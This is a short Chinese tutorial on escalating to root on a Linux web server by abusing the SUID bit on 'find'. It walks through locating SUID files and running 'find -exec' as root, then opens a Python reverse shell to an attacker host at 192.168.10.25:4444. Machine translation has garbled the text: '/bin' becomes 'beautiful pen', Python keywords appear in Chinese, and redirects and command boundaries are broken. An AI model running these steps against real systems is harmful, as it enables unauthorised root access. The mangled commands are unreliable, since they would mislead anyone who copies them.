Linux提权,linux提权命令
SUID允许调用者以文件所有者的身份运行文件,所以使用SUID提升权限的思路是运行root用户拥有的SUID的文件,所以我们在运行文件的时候要得到root用户的身份。
可用于声明权力的已知linux可行性文件列表如下:
nmap vim find bash more less nano CP
以下命令可以发现系统上运行的所有SUID可执行文件。
1.#以下命令将尝试以root权限查找SUID的文件。不同的系统适合不同的命令。试试2。find/-perm-u=s-type F2/dev/null 3 . find/-user root-perm-4000-print 2/dev/null 4 . find/-user root-perm。
使用查找文件提升权限
如果我们现在得到了一个网站服务器的外壳,但是权限是ubuntu,我们需要马上提升到root用户的权限。
我们以超级用户权限查看SUID文件。
find/-perm -u=s -type f 2/dev/null
我们随便找一个命令利用一下,我们就找find,先查一下它的信息,发现确实是root用户权限的SUID的文件。
首先,让我们看看是否可以使用find命令以root身份运行,并且发现我们确实可以以root身份运行。
/usr/beautiful pen/find examples . desktop-exec whoami/;
至于这里为什么可以用find -exec,你可以查一下find帮助或者man手册。
然后我们检查目标网站上是否有python环境,可以看到有python2.7.6环境。
所以我们使用python作为root用户来反弹shell。
python -c 导入套接字、子进程、OS;s=socket.socket(socket。AF_INET,socket。SOCK _ STREAM);s.connect((192.168.10.25 ,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess . call([/beautiful pen/sh ,-I ]);#弹起一枚sh型炮弹
大家可以看到,反弹回来的壳是攻击端收到的,是root。